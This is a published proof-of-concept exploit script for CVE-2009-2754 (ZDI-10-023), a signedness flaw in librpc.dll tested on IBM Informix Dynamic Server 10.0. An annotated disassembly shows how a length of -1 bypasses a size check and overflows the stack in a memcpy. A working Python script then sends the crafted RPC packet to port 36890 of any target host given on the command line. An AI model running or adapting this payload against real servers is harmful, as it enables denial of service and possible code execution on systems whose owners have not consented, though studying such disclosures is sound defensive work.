# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability |
# Date: 2010-04-08 |
# Author: ZSploit.com |
# Software Link: N/A |
# Version: N/A |
# Tested on: IBM Informix Dynamic Server 10.0 |
# CVE : CVE-2009-2754 |
|
#! /usr/bin/env python |
############################################################################### |
## File : zs_ids_rpc.py |
## Description: |
## : |
## Created_On : Mar 21 2010 |
## |
## (c) Copyright 2010, ZSploit.com. all rights reserved. |
############################################################################### |
""" |
The issue in __lgto_svcauth_unix(): |
|
.text:1000B8E1 mov [ebp+0], eax |
.text:1000B8E4 mov eax, [ebx] |
.text:1000B8E6 push eax ; netlong |
.text:1000B8E7 add ebx, 4 |
.text:1000B8EA call esi ; ntohl ; Get length of hostname |
.text:1000B8EC cmp eax, 0FFh ; Signedness error, if we give 0xffffffff(-1) will pass this check |
.text:1000B8F1 jle short loc_1000B8FD |
.text:1000B8F3 mov esi, 1 |
.text:1000B8F8 jmp loc_1000B9D5 |
.text:1000B8FD ; --------------------------------------------------------------------------- |
.text:1000B8FD |
.text:1000B8FD loc_1000B8FD: ; CODE XREF: __lgto_svcauth_unix+71j |
.text:1000B8FD mov edi, [ebp+4] |
.text:1000B900 mov ecx, eax |
.text:1000B902 mov edx, ecx |
.text:1000B904 mov esi, ebx |
.text:1000B906 shr ecx, 2 |
.text:1000B909 rep movsd ; call memcpy here with user-supplied size cause a stack overflow |
.text:1000B90B mov ecx, edx |
.text:1000B90D add eax, 3 |
.text:1000B910 and ecx, 3 |
.text:1000B913 rep movsb |
""" |
|
import sys |
import socket |
|
if (len(sys.argv) != 2): |
print "Usage:\t%s [target]" % sys.argv[0] |
sys.exit(0) |
|
|
data = "\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" \ |
"\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" \ |
"\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41" \ |
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42" \ |
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \ |
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00" |
|
host = sys.argv[1] |
port = 36890 |
|
print "PoC for ZDI-10-023 by ZSploit.com" |
try: |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
try: |
s.connect((host, port)) |
s.send(data) |
print "Sending payload .." |
except: |
print "Error in send" |
print "Done" |
except: |
print "Error in socket" |
|
The ZSploit Team |
http://zsploit.com |
0 条评论。